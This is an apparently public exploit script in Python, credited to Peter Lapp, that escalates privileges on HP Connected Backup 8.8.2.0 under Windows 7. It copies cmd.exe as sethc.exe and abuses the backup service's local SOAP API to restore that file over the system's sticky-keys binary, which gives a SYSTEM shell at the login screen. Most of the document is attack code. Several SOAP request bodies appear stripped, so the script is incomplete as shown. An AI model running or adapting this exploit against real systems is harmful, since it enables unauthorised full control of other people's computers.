#Tested on HP Connected Backup version 8.8.2.0 on Windows 7 x64 import os import sys import time import requests from bs4 import BeautifulSoup def send_request(body): url="http://localhost:16386/" headers = {"Content-Type": "text/xml; charset=utf-8", 'SOAPAction': '""', "Set-Cookie": "CCSessionID=SessionID11"} response = requests.post(url, data=body, headers=headers) if response.status_code != requests.codes.ok: print "Non-200 response. Exiting..." sys.exit() else: return response.text def get_tdate(response): soup = BeautifulSoup(response, "html.parser") tdate = soup.findAll("m-tdate")[0].string return tdate #Copy cmd.exe to world-writeable folder print "HP Connected Backup Privilege Escalation by Peter Lapp(lappsec)" print "Copying cmd.exe to C:\\hpcb-privesc" os.system("mkdir C:\\hpcb-privesc") os.system("copy C:\\Windows\\system32\\cmd.exe C:\\hpcb-privesc\\sethc.exe") print "Creating backup for C:\\hpcb-privesc\\sethc.exe" #StartScan required before IncludeFile request will be accepted send_request("""""") time.sleep(3) #Add file to backup send_request("""QzpcaHBjYi1wcml2ZXNjXHNldGhjLmV4ZQ==true""") print "Initiating Backup" #Start backup send_request("""""") print """Sleeping for 300 seconds to give time for backup to complete. If the script fails after this then change the sleep period to give the backup enough time to complete""" time.sleep(300) print "Initiating restore" #PrepareRetrieve requires valid PID of process running as SYSTEM. PID 456 is common for Windows 7 but if it fails, try another send_request("""456""") #We have to get the m-TDate value for the file in order for the restore to work correctly print "Getting m-TDate value" fileinfo = send_request("""QzpcaHBjYi1wcml2ZXNjXA==""") tdate = get_tdate(fileinfo) print "Adding Restore file" send_request("""QzpcaHBjYi1wcml2ZXNjXHNldGhjLmV4ZQ==false"""+tdate+"""""") print "Setting alternate restore path to C:\\Windows\\system32\\" send_request("""C:\Windows\system32false""") #Set restore to replace existing file send_request("""true""") print "Restoring C:\\hpcb-privesc\\sethc.exe to C:\\Windows\\system32\\sethc.exe" send_request("""""") print "If it made it this far without an error, then you should now be able to log out, press SHIFT 5 times and be given a command prompt as SYSTEM. Enjoy!"